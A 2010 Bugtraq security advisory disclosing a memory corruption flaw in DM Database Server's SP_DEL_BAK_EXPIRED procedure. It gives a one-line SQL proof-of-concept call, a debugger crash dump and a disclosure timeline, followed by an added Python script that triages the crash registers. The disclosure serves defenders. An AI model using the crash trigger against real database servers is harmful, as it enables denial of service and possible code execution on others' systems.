Date: 31 May 2010 01:30:42 -0000
From: wsn1983@...il.com
To: bugtraq@...urityfocus.com
Subject: DM Database Server Memory Corruption Vulnerability

DM Database Server Memory Corruption Vulnerability


Vulnerable:	All versions
Vendor:		www.dameng.com
Discovered by:	Shennan Wang (HuaweiSymantec SRT)


Details:
=========
A vulnerability in all versions of DM Database Server allows an attacker to execute arbitrary code or cause a DoS (Denial of Service). Authentication is required to exploit this vulnerability.

The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.


POC: 
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');



(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll - 
wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"



Timeline:
========
2010.04.17   Reported to vendor, no response.
2010.05.31   Public
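
A triage reading of the debugger output above, as an added example that is not part of the original advisory: it parses the register dump and faulting instruction (copied inline from the post) and reports which address the faulting `repne scas` touched. The function names and the 64 KB null-guard threshold are assumptions of this example.

```python
import re

# Constructed input: lines copied from the debugger output quoted in the advisory.
CRASH = """\
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc
wdm_dll+0xd1753:
100d1753 f2ae            repne scas byte ptr es:[edi]
"""

NULL_GUARD = 0x10000  # assumption: the lowest 64 KB of a Win32 process is unmapped


def parse_registers(text):
    """Return {'eax': 0, ...} from WinDbg register lines."""
    pairs = re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", text)
    return {name: int(value, 16) for name, value in pairs}


def parse_fault(text):
    """Return (module+offset, mnemonic, register used as the memory operand)."""
    site = re.search(r"^(\w+\+0x[0-9a-f]+):$", text, re.M).group(1)
    ins = re.search(
        r"^[0-9a-f]{8} [0-9a-f]+\s+(.+?)\s+\w+ ptr \w+:\[(e[a-z]{2})\]$", text, re.M)
    return site, ins.group(1), ins.group(2)


def triage(text):
    """Summarise what the faulting instruction touched, using only the dump."""
    regs = parse_registers(text)
    site, mnemonic, reg = parse_fault(text)
    address = regs[reg]
    scan = mnemonic == "repne scas"  # scas compares al with the byte at es:[edi]
    return {
        "site": site,
        "access": "read" if scan else "unknown",
        "address": address,
        "near_null": address < NULL_GUARD,
        # al == 0 with ecx == 0xffffffff is the usual inline strlen() setup; ecx
        # still at its start value means the very first byte read faulted.
        "strlen_first_byte": scan and regs["eax"] & 0xFF == 0
                             and regs["ecx"] == 0xFFFFFFFF,
    }


if __name__ == "__main__":
    for key, value in triage(CRASH).items():
        print(key, hex(value) if key == "address" else value)
```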
